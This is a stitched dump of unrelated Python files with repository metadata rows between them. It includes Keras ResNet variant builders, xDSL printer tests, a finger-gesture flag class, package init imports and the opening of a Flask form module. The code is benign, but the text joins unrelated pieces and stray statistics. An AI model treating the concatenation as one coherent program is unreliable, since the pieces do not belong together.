            csY = Convolution2D(cf(32 * mY), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cY_a_{}'.format(i))(stage_startY)
            csU = Convolution2D(cf(32 * mU), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cU_a_{}'.format(i))(stage_startU)
            csV = Convolution2D(cf(32 * mV), 1, 1, bias=False, init=init, W_regularizer=l2(reg),
                                name='cV_a_{}'.format(i))(stage_startV)
        # Bottleneck body per stream: BN-ReLU-3x3 then BN-ReLU-1x1 expand.
        bn = BatchNormalization(axis=pr_axis, name='bnY_a_{}'.format(i))(csY)
        ac = Activation('relu', name='aY_a_{}'.format(i))(bn)
        c = Convolution2D(cf(32 * mY), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
                          name='cY_b_{}'.format(i))(ac)
        bn2 = BatchNormalization(axis=pr_axis, name='bnY_b{}'.format(i))(c)
        ac2 = Activation('relu', name='aY_b_{}'.format(i))(bn2)
        c2Y = Convolution2D(cf(128 * mY), 1, 1, init=init, W_regularizer=l2(reg), name='cY_c_{}'.format(i))(ac2)
        # stage_startY = merge([stage_startY, c2Y], mode='sum', name='+Y_{}'.format(i))
        bn = BatchNormalization(axis=pr_axis, name='bnU_a_{}'.format(i))(csU)
        ac = Activation('relu', name='aU_a_{}'.format(i))(bn)
        c = Convolution2D(cf(32 * mU), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
                          name='cU_b_{}'.format(i))(ac)
        bn2 = BatchNormalization(axis=pr_axis, name='bnU_b{}'.format(i))(c)
        ac2 = Activation('relu', name='aU_b_{}'.format(i))(bn2)
        c2U = Convolution2D(cf(128 * mU), 1, 1, init=init, W_regularizer=l2(reg), name='cU_c_{}'.format(i))(ac2)
        # stage_startU = merge([stage_startU, c2U], mode='sum', name='+U_{}'.format(i))
        bn = BatchNormalization(axis=pr_axis, name='bnV_a_{}'.format(i))(csV)
        ac = Activation('relu', name='aV_a_{}'.format(i))(bn)
        c = Convolution2D(cf(32 * mV), 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
                          name='cV_b_{}'.format(i))(ac)
        bn2 = BatchNormalization(axis=pr_axis, name='bnV_b{}'.format(i))(c)
        ac2 = Activation('relu', name='aV_b_{}'.format(i))(bn2)
        c2V = Convolution2D(cf(128 * mV), 1, 1, init=init, W_regularizer=l2(reg), name='cV_c_{}'.format(i))(ac2)
        # stage_startV = merge([stage_startV, c2V], mode='sum', name='+V_{}'.format(i))
        #---____Cross-connections___---#
        # Cross-connect the stage outputs, concat onto each stream, then
        # close the residual: the concat result is summed with the stage
        # input (shapes must already agree thanks to the 'acc' round above).
        Y_to_U = Convolution2D(16, 1, 1, init=init, activation='relu', name='YtoU_{}'.format(i))(c2Y)
        Y_to_V = Convolution2D(16, 1, 1, init=init, activation='relu', name='YtoV_{}'.format(i))(c2Y)
        U_to_Y = Convolution2D(8, 1, 1, init=init, activation='relu', name='UtoY_{}'.format(i))(c2U)
        U_to_V = Convolution2D(8, 1, 1, init=init, activation='relu', name='UtoV_{}'.format(i))(c2U)
        V_to_Y = Convolution2D(8, 1, 1, init=init, activation='relu', name='VtoY_{}'.format(i))(c2V)
        V_to_U = Convolution2D(8, 1, 1, init=init, activation='relu', name='VtoU_{}'.format(i))(c2V)
        xmY = merge([c2Y, U_to_Y, V_to_Y], mode='concat', concat_axis=pr_axis, name='XY_{}'.format(i))
        xmU = merge([c2U, Y_to_U, V_to_U], mode='concat', concat_axis=pr_axis, name='XU_{}'.format(i))
        xmV = merge([c2V, Y_to_V, U_to_V], mode='concat', concat_axis=pr_axis, name='XV_{}'.format(i))
        stage_startY = merge([stage_startY, xmY], mode='sum', name='+Y_{}'.format(i))
        stage_startU = merge([stage_startU, xmU], mode='sum', name='+U_{}'.format(i))
        stage_startV = merge([stage_startV, xmV], mode='sum', name='+V_{}'.format(i))
    # Fuse the three streams and classify: BN-ReLU, global-ish average
    # pool (assumes 16x16 feature maps at this depth -- TODO confirm),
    # flatten, softmax.
    fmerge = merge([stage_startY, stage_startU, stage_startV], mode='concat', concat_axis=pr_axis)
    bnF = BatchNormalization(axis=pr_axis, name='bn_f')(fmerge)
    rF = Activation('relu', name='a_f')(bnF)
    p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)
    f = Flatten()(p)
    out = Dense(nb_classes, activation='softmax', name='output_softmax')(f)
    model = Model(input=inputYUV, output=out)
    return model
def get_resnet_xception(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
    """Residual network whose stage body is one separable convolution.

    A strided 3x3 stem (conv + BN + ReLU) feeds ``nb_stages``
    pre-activation residual stages; each stage applies a single 3x3
    SeparableConvolution2D and sums the result back onto the trunk.
    The head is BN-ReLU, 16x16 average pooling, and a softmax.

    :param input_shape: input tensor shape (without the batch axis)
    :param nb_classes: number of classes for the final softmax
    :param init: weight initialisation scheme name (Keras 1 style)
    :param reg: L2 regularisation factor
    :param pr_axis: channel axis for BatchNormalization
    :param nb_stages: number of residual stages
    :return: an uncompiled Keras ``Model``
    """
    net_in = Input(shape=input_shape)
    stem = Convolution2D(128, 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init,
                         W_regularizer=l2(reg), name='inp_conv')(net_in)
    stem = BatchNormalization(axis=pr_axis, name='inp_bn')(stem)
    trunk = Activation('relu', name='inp_ac')(stem)
    for j in range(nb_stages):
        branch = trunk
        # Pre-activation (BN + ReLU) before the conv; stage 0 skips it
        # because the stem already ends in an activation.
        if j > 0:
            branch = BatchNormalization(axis=pr_axis, name='bn_c_{}'.format(j))(branch)
            branch = Activation('relu', name='a_c_{}'.format(j))(branch)
        branch = SeparableConvolution2D(128, 3, 3, init=init, pointwise_regularizer=l2(reg),
                                        depthwise_regularizer=l2(reg), border_mode='same')(branch)
        trunk = merge([trunk, branch], mode='sum', name='+_{}'.format(j))
    head = BatchNormalization(axis=pr_axis, name='bn_f')(trunk)
    head = Activation('relu', name='a_f')(head)
    head = AveragePooling2D(pool_size=(16, 16), name='avp_f')(head)
    head = Flatten()(head)
    out = Dense(nb_classes, activation='softmax', name='output_softmax')(head)
    return Model(input=net_in, output=out)
def get_resnet_baseelu(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
    """ELU variant of the baseline residual network (no batch norm).

    A 5x5 ELU stem convolution followed by a strided 3x3 ELU convolution
    feeds ``nb_stages`` bottleneck residual stages (1x1 -> 3x3 -> 1x1,
    biased convs, ELU pre-activations).  The head is ELU, 16x16 average
    pooling, flatten, softmax.

    Changes vs. the original: removed the unused local ``xspots`` and the
    dead commented-out BatchNorm experiments; behavior is unchanged.

    :param input_shape: input tensor shape (without the batch axis)
    :param nb_classes: number of classes for the final softmax
    :param init: weight initialisation scheme name (Keras 1 style)
    :param reg: L2 regularisation factor
    :param pr_axis: channel axis (unused here -- no BatchNorm layers)
    :param nb_stages: number of residual stages
    :return: an uncompiled Keras ``Model``
    """
    i = Input(shape=input_shape)
    c0i = Convolution2D(96, 5, 5, border_mode='same', init=init, W_regularizer=l2(reg),
                        name='inp_conv', activation='elu')(i)
    c0i2 = Convolution2D(32, 3, 3, subsample=(2, 2), border_mode='same', init=init, W_regularizer=l2(reg),
                         name='inp_conv2', activation='elu')(c0i)
    stage_start = c0i2
    for j in range(nb_stages):
        if j > 0:
            # Pre-activation before the bottleneck entry; skipped on
            # stage 0, whose input already went through an ELU in the stem.
            x = Activation('elu', name='a_c_{}'.format(j))(stage_start)
            cs = Convolution2D(32, 1, 1, bias=True, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(x)
        else:
            cs = Convolution2D(32, 1, 1, bias=True, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(
                stage_start)
        acs = Activation('elu', name='a_a_{}'.format(j))(cs)
        cs2 = Convolution2D(32, 3, 3, bias=True, border_mode='same', init=init, W_regularizer=l2(reg),
                            name='c_b_{}'.format(j))(acs)
        # NOTE(review): 'relu' here breaks the otherwise all-ELU design of
        # this function (possibly copied from get_ror_resnet).  Kept as-is
        # to preserve behavior; confirm whether 'elu' was intended.
        acs2 = Activation('relu', name='a_b_{}'.format(j))(cs2)
        cve = Convolution2D(32, 1, 1, init=init, W_regularizer=l2(reg), name='c_c_{}'.format(j))(acs2)
        stage_start = merge([stage_start, cve], mode='sum', name='+_{}'.format(j))
    rF = Activation('elu', name='a_f')(stage_start)
    p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)
    f = Flatten()(p)
    out = Dense(nb_classes, activation='softmax', name='output_softmax', init=init)(f)
    model = Model(input=i, output=out)
    return model
def get_ror_resnet(input_shape, nb_classes, init, reg, pr_axis, nb_stages):
    """Residual-of-Residuals network with a second-level shortcut.

    Standard pre-activation bottleneck stages, plus an outer shortcut
    (``every_5``) that is folded into the residual sum every third stage.

    :param input_shape: input tensor shape (without the batch axis)
    :param nb_classes: number of classes for the final softmax
    :param init: weight initialisation scheme name (Keras 1 style)
    :param reg: L2 regularisation factor
    :param pr_axis: channel axis for BatchNormalization
    :param nb_stages: number of residual stages
    :return: tuple ``(model, xspots)`` where ``xspots`` is the list of
        layer names marking potential cross-connection points
    """
    i = Input(shape=input_shape)
    c0i = Convolution2D(128, 3, 3, subsample=(2, 2), border_mode='same', bias=False, init=init, W_regularizer=l2(reg),
                        name='inp_conv')(i)
    b0i = BatchNormalization(axis=pr_axis, name='inp_bn')(c0i)
    r0i = Activation('relu', name='inp_ac')(b0i)
    xspots = ['inp_ac']
    stage_start = r0i
    # Outer-level shortcut; despite the name it is refreshed every 3
    # stages (see the `% 3` check below), not every 5.
    every_5 = r0i
    for j in range(nb_stages):
        if j > 0:
            # x = Activation('linear',name='xm_{}'.format(j))(stage_start)
            # x = MaxPooling2D(pool_size=(1, 1), name='xm_{}'.format(j))(stage_start)
            # xspots.append('xm_{}'.format(j))
            # Pre-activation before the bottleneck entry; stage 0 skips it
            # because the stem already ends in an activation.
            x = BatchNormalization(axis=pr_axis, name='bn_c_{}'.format(j))(stage_start)
            x = Activation('relu', name='a_c_{}'.format(j))(x)
            cs = Convolution2D(32, 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(x)
        else:
            cs = Convolution2D(32, 1, 1, bias=False, init=init, W_regularizer=l2(reg), name='c_a_{}'.format(j))(
                stage_start)
        # Bottleneck body: BN-ReLU-3x3, then BN-ReLU-1x1 expand to 128.
        bns = BatchNormalization(axis=pr_axis, name='bn_a_{}'.format(j))(cs)
        acs = Activation('relu', name='a_a_{}'.format(j))(bns)
        cs2 = Convolution2D(32, 3, 3, bias=False, border_mode='same', init=init, W_regularizer=l2(reg),
                            name='c_b_{}'.format(j))(acs)
        bns2 = BatchNormalization(axis=pr_axis, name='bn_b{}'.format(j))(cs2)
        acs2 = Activation('relu', name='a_b_{}'.format(j))(bns2)
        cve = Convolution2D(128, 1, 1, init=init, W_regularizer=l2(reg), name='c_c_{}'.format(j))(acs2)
        xspots.append('c_c_{}'.format(j))
        if (j+1) % 3==0:
            # Every third stage, also add the outer shortcut and rebase it.
            stage_start = merge([stage_start, cve, every_5], mode='sum', name='+_{}'.format(j))
            every_5 = stage_start
        else:
            stage_start = merge([stage_start, cve], mode='sum', name='+_{}'.format(j))
    # 16 + 11*24
    bnF = BatchNormalization(axis=pr_axis, name='bn_f')(stage_start)
    rF = Activation('relu', name='a_f')(bnF)
    p = AveragePooling2D(pool_size=(16, 16), name='avp_f')(rF)
    f = Flatten()(p)
    out = Dense(nb_classes, activation='softmax', name='output_softmax')(f)
    model = Model(input=i, output=out)
    return model, xspots
| 57.385204
| 140
| 0.602534
| 3,244
| 22,495
| 3.968557
| 0.05857
| 0.047305
| 0.044275
| 0.057636
| 0.938714
| 0.930247
| 0.924344
| 0.911061
| 0.908498
| 0.908187
| 0
| 0.036611
| 0.215603
| 22,495
| 392
| 141
| 57.385204
| 0.693001
| 0.081885
| 0
| 0.77707
| 0
| 0
| 0.076964
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028662
| false
| 0
| 0.015924
| 0.009554
| 0.073248
| 0.006369
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b7ec46d29865409d14aa267fab7a5cb49f8fe68
| 6,890
|
py
|
Python
|
tests/printer_test.py
|
anh-ng-21/xdsl
|
bb171400934d8b5a8749b03eb038023d3c9701a7
|
[
"Apache-2.0"
] | null | null | null |
tests/printer_test.py
|
anh-ng-21/xdsl
|
bb171400934d8b5a8749b03eb038023d3c9701a7
|
[
"Apache-2.0"
] | null | null | null |
tests/printer_test.py
|
anh-ng-21/xdsl
|
bb171400934d8b5a8749b03eb038023d3c9701a7
|
[
"Apache-2.0"
] | null | null | null |
from io import StringIO
from xdsl.printer import Printer
from xdsl.parser import Parser
from xdsl.dialects.builtin import Builtin
from xdsl.dialects.arith import *
from xdsl.diagnostic import Diagnostic
def test_forgotten_op():
    """Printing an op whose operand was never printed must raise KeyError."""
    context = MLContext()
    _ = Arith(context)  # side-effectful dialect setup, presumably
    literal = Constant.from_int_constant(42, 32)
    addition = Addi.get(literal, literal)
    addition.verify()
    raised = False
    try:
        Printer().print_op(addition)
    except KeyError:
        raised = True
    assert raised, "Exception expected"
def test_op_message():
    """Test that an operation message can be printed."""
    # Input: a module with a constant and an addition.
    prog = \
        """module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    # Expected: the constant op underlined with carets, the attached
    # message beneath it, closed by a dashed rule of the same width.
    expected = \
        """module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message
--------------------------------------------------
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    ctx = MLContext()
    # Dialect objects bound to ctx; instantiation presumably registers
    # their ops with the context (the locals are otherwise unused).
    arith = Arith(ctx)
    builtin = Builtin(ctx)
    parser = Parser(ctx, prog)
    module = parser.parse_op()
    file = StringIO("")
    diagnostic = Diagnostic()
    # Attach the message to the first op inside the module body.
    diagnostic.add_message(module.ops[0], "Test message")
    printer = Printer(stream=file, diagnostic=diagnostic)
    printer.print_op(module)
    assert file.getvalue().strip() == expected.strip()
def test_two_different_op_messages():
    """Test that an operation message can be printed."""
    # Input: a module with a constant and an addition.
    prog = \
        """module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    # Expected: each op gets its own caret underline and message; the
    # rule width matches each op's own text width.
    expected = \
        """module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message 1
--------------------------------------------------
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message 2
--------------------------------------------
}"""
    ctx = MLContext()
    # Dialect objects bound to ctx; instantiation presumably registers
    # their ops with the context (the locals are otherwise unused).
    arith = Arith(ctx)
    builtin = Builtin(ctx)
    parser = Parser(ctx, prog)
    module = parser.parse_op()
    file = StringIO("")
    diagnostic = Diagnostic()
    # One message per op.
    diagnostic.add_message(module.ops[0], "Test message 1")
    diagnostic.add_message(module.ops[1], "Test message 2")
    printer = Printer(stream=file, diagnostic=diagnostic)
    printer.print_op(module)
    assert file.getvalue().strip() == expected.strip()
def test_two_same_op_messages():
    """Test that an operation message can be printed."""
    # Input: a module with a constant and an addition.
    prog = \
        """module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    # Expected: two messages attached to the SAME op are stacked, each
    # with its own caret underline and dashed rule.
    expected = \
        """module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message 1
--------------------------------------------------
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
| Test message 2
--------------------------------------------------
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    ctx = MLContext()
    # Dialect objects bound to ctx; instantiation presumably registers
    # their ops with the context (the locals are otherwise unused).
    arith = Arith(ctx)
    builtin = Builtin(ctx)
    parser = Parser(ctx, prog)
    module = parser.parse_op()
    file = StringIO("")
    diagnostic = Diagnostic()
    # Messages may be added after the printer is constructed: the printer
    # holds a reference to the same Diagnostic object.
    printer = Printer(stream=file, diagnostic=diagnostic)
    diagnostic.add_message(module.ops[0], "Test message 1")
    diagnostic.add_message(module.ops[0], "Test message 2")
    printer.print_op(module)
    assert file.getvalue().strip() == expected.strip()
def test_op_message_with_region():
    """Test that an operation message can be printed on an operation with a region."""
    prog = \
        """module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    # Expected: the message is attached to the module op itself, so the
    # carets underline only the op header line, not the region body.
    expected = \
        """\
module() {
^^^^^^^^
| Test
--------
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    ctx = MLContext()
    # Dialect objects bound to ctx; instantiation presumably registers
    # their ops with the context (the locals are otherwise unused).
    arith = Arith(ctx)
    builtin = Builtin(ctx)
    parser = Parser(ctx, prog)
    module = parser.parse_op()
    file = StringIO("")
    diagnostic = Diagnostic()
    printer = Printer(stream=file, diagnostic=diagnostic)
    # Attach to the outer module op (which owns a region).
    diagnostic.add_message(module, "Test")
    printer.print_op(module)
    assert file.getvalue().strip() == expected.strip()
def test_op_message_with_region_and_overflow():
    """
    Test that an operation message can be printed on an operation with a region,
    where the message is bigger than the operation.
    """
    prog = \
        """module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    # Expected: the message is wider than the op header, so the caret line
    # is padded with dashes out to the message width.
    expected = \
        """\
module() {
^^^^^^^^-------
| Test message
---------------
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    ctx = MLContext()
    # Dialect objects bound to ctx; instantiation presumably registers
    # their ops with the context (the locals are otherwise unused).
    arith = Arith(ctx)
    builtin = Builtin(ctx)
    parser = Parser(ctx, prog)
    module = parser.parse_op()
    file = StringIO("")
    diagnostic = Diagnostic()
    printer = Printer(stream=file, diagnostic=diagnostic)
    # Message longer than "module() {" -> triggers the overflow padding.
    diagnostic.add_message(module, "Test message")
    printer.print_op(module)
    assert file.getvalue().strip() == expected.strip()
def test_diagnostic():
    """
    Test that Diagnostic.raise_exception actually raises, and that the
    raised exception carries a non-empty message.

    Fixed: the original silently passed when raise_exception did NOT
    raise (the except branch was the only assertion site).
    """
    prog = \
        """module() {
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    # NOTE(review): `expected` is never compared against anything, and its
    # "Test message" text does not match the "Test" message attached below.
    # Kept for reference until the intended comparison is implemented.
    expected = \
        """\
Exception: test message
module() {
^^^^^^^^-------
| Test message
---------------
%0 : !i32 = arith.constant() ["value" = 42 : !i32]
%1 : !i32 = arith.addi(%0 : !i32, %0 : !i32)
}"""
    ctx = MLContext()
    # Dialect objects bound to ctx; instantiation presumably registers
    # their ops with the context (the locals are otherwise unused).
    arith = Arith(ctx)
    builtin = Builtin(ctx)
    parser = Parser(ctx, prog)
    module = parser.parse_op()
    diag = Diagnostic()
    diag.add_message(module, "Test")
    try:
        diag.raise_exception("test message", module)
    except Exception as e:
        # The exception text must be non-empty.
        assert str(e)
        return
    assert False, "Exception expected"
# NOTE(review): "costum" is a typo for "custom"; renaming would change the
# collected test id, so it is left as-is here.
def test_print_costum_name():
    """
    Test that an SSAValue, that is a name and not a number, reserves that name
    """
    # Input: the constant result is named %i; the addi result is numbered.
    prog = \
        """module() {
%i : !i32 = arith.constant() ["value" = 42 : !i32]
%213 : !i32 = arith.addi(%i : !i32, %i : !i32)
}"""
    # Expected: %i survives; the numbered value is renumbered from 0.
    expected = \
        """\
module() {
%i : !i32 = arith.constant() ["value" = 42 : !i32]
%0 : !i32 = arith.addi(%i : !i32, %i : !i32)
}"""
    ctx = MLContext()
    # Dialect objects bound to ctx; instantiation presumably registers
    # their ops with the context (the locals are otherwise unused).
    arith = Arith(ctx)
    builtin = Builtin(ctx)
    parser = Parser(ctx, prog)
    module = parser.parse_op()
    file = StringIO("")
    printer = Printer(stream=file)
    printer.print_op(module)
    assert file.getvalue().strip() == expected.strip()
| 25.805243
| 86
| 0.537446
| 777
| 6,890
| 4.700129
| 0.113256
| 0.040526
| 0.061336
| 0.080504
| 0.802848
| 0.796002
| 0.796002
| 0.785871
| 0.758762
| 0.758762
| 0
| 0.044557
| 0.228012
| 6,890
| 266
| 87
| 25.902256
| 0.642038
| 0.088389
| 0
| 0.715517
| 0
| 0
| 0.031644
| 0
| 0
| 0
| 0
| 0
| 0.068966
| 1
| 0.068966
| false
| 0
| 0.051724
| 0
| 0.12931
| 0.137931
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8e8b11a97e7dcaf62ef34fe082a41339d43e98f7
| 150
|
py
|
Python
|
thermal_barrierlife_prediction/__init__.py
|
SabrinaRichter/thermal_barrierlife_prediction
|
bb90168119a4074f00fb436ca74072c26797d073
|
[
"BSD-3-Clause"
] | null | null | null |
thermal_barrierlife_prediction/__init__.py
|
SabrinaRichter/thermal_barrierlife_prediction
|
bb90168119a4074f00fb436ca74072c26797d073
|
[
"BSD-3-Clause"
] | null | null | null |
thermal_barrierlife_prediction/__init__.py
|
SabrinaRichter/thermal_barrierlife_prediction
|
bb90168119a4074f00fb436ca74072c26797d073
|
[
"BSD-3-Clause"
] | null | null | null |
from thermal_barrierlife_prediction.estimator_cnn import EstimatorCNN
from thermal_barrierlife_prediction.ensemble_estimator import EnsembleEstimator
| 50
| 79
| 0.933333
| 16
| 150
| 8.375
| 0.625
| 0.164179
| 0.328358
| 0.477612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.053333
| 150
| 2
| 80
| 75
| 0.943662
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8e90f6f5d289efeb49c55dc0a463d0288094364b
| 1,628
|
py
|
Python
|
preprocess/finger_flag.py
|
congtranv/Unified-Gesture-and-Fingertip-Detection
|
5606c2afed462d0bf5686b10c441a6b7d0dbc7ad
|
[
"MIT"
] | 200
|
2019-09-18T08:18:25.000Z
|
2022-03-21T14:52:46.000Z
|
preprocess/finger_flag.py
|
congtranv/Unified-Gesture-and-Fingertip-Detection
|
5606c2afed462d0bf5686b10c441a6b7d0dbc7ad
|
[
"MIT"
] | 15
|
2019-10-09T08:07:41.000Z
|
2022-03-14T08:40:30.000Z
|
preprocess/finger_flag.py
|
congtranv/Unified-Gesture-and-Fingertip-Detection
|
5606c2afed462d0bf5686b10c441a6b7d0dbc7ad
|
[
"MIT"
] | 43
|
2019-10-06T12:25:02.000Z
|
2022-03-09T05:01:55.000Z
|
class Finger:
    """Lookup of finger up/down flags for single-hand number gestures.

    Each ``SingleX`` method returns a 5-tuple of booleans
    ``(thumb, index, middle, ring, pinky)`` where True means the finger is
    extended in that gesture.  Fixed: the constructor was mistyped as
    ``__int__`` (the int-conversion hook) instead of ``__init__``.
    """

    def __init__(self):
        pass

    @staticmethod
    def SingleOne():
        """One: index only."""
        return False, True, False, False, False

    @staticmethod
    def SingleTwo():
        """Two: index and middle."""
        return False, True, True, False, False

    @staticmethod
    def SingleThree():
        """Three: index, middle and ring."""
        return False, True, True, True, False

    @staticmethod
    def SingleFour():
        """Four: all but the thumb."""
        return False, True, True, True, True

    @staticmethod
    def SingleFive():
        """Five: all fingers extended."""
        return True, True, True, True, True

    @staticmethod
    def SingleSix():
        """Six: thumb and pinky."""
        return True, False, False, False, True

    @staticmethod
    def SingleSeven():
        """Seven: thumb, index and pinky."""
        return True, True, False, False, True

    @staticmethod
    def SingleEight():
        """Eight: thumb and index."""
        return True, True, False, False, False
| 21.421053
| 48
| 0.525184
| 158
| 1,628
| 5.386076
| 0.14557
| 0.141011
| 0.150411
| 0.206816
| 0.836663
| 0.814336
| 0.814336
| 0.780259
| 0.780259
| 0.693302
| 0
| 0
| 0.408477
| 1,628
| 75
| 49
| 21.706667
| 0.883697
| 0
| 0
| 0.820896
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.134328
| false
| 0.014925
| 0
| 0
| 0.268657
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8ea7d24f62535a29f829fdf5934f2e9e8bc2ed32
| 98
|
py
|
Python
|
rl_trainer/agent/replay_buffer/__init__.py
|
Roboy/nips-2018-ai-for-prosthetics
|
acb69f267a0cc852842828edbbfb47d1840c0a17
|
[
"BSD-3-Clause"
] | 3
|
2018-08-31T15:04:53.000Z
|
2019-07-13T01:11:10.000Z
|
rl_trainer/agent/replay_buffer/__init__.py
|
Roboy/nips-2018-ai-for-prosthetics
|
acb69f267a0cc852842828edbbfb47d1840c0a17
|
[
"BSD-3-Clause"
] | null | null | null |
rl_trainer/agent/replay_buffer/__init__.py
|
Roboy/nips-2018-ai-for-prosthetics
|
acb69f267a0cc852842828edbbfb47d1840c0a17
|
[
"BSD-3-Clause"
] | null | null | null |
from .replay_buffer import ReplayBuffer
from .in_memory_replay_buffer import InMemoryReplayBuffer
| 32.666667
| 57
| 0.897959
| 12
| 98
| 7
| 0.666667
| 0.285714
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081633
| 98
| 2
| 58
| 49
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9204ab65ce483dde88e5c2b4c89472b1725ef3e
| 47
|
py
|
Python
|
pyles/widgets/__init__.py
|
unlikelymaths/pyles
|
bb59f8753528c4f14c2d4fcd8c165f885e49426e
|
[
"MIT"
] | null | null | null |
pyles/widgets/__init__.py
|
unlikelymaths/pyles
|
bb59f8753528c4f14c2d4fcd8c165f885e49426e
|
[
"MIT"
] | null | null | null |
pyles/widgets/__init__.py
|
unlikelymaths/pyles
|
bb59f8753528c4f14c2d4fcd8c165f885e49426e
|
[
"MIT"
] | null | null | null |
import widgets.image_widget
import widgets.util
| 23.5
| 27
| 0.893617
| 7
| 47
| 5.857143
| 0.714286
| 0.634146
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06383
| 47
| 2
| 28
| 23.5
| 0.931818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d9220ca81f68e37f572f33e7e535034a8c806f29
| 54,469
|
py
|
Python
|
lightserv/clearing/forms.py
|
BrainCOGS/lightserv
|
a47bfb911f095030d811b755acb458c71f18baa2
|
[
"BSD-3-Clause"
] | null | null | null |
lightserv/clearing/forms.py
|
BrainCOGS/lightserv
|
a47bfb911f095030d811b755acb458c71f18baa2
|
[
"BSD-3-Clause"
] | null | null | null |
lightserv/clearing/forms.py
|
BrainCOGS/lightserv
|
a47bfb911f095030d811b755acb458c71f18baa2
|
[
"BSD-3-Clause"
] | null | null | null |
from flask_wtf import FlaskForm
from wtforms import SubmitField, TextAreaField, StringField
from wtforms.fields.html5 import (DateField,
DateTimeLocalField)
from wtforms.validators import DataRequired, Length, InputRequired, ValidationError, Optional
from flask import Markup
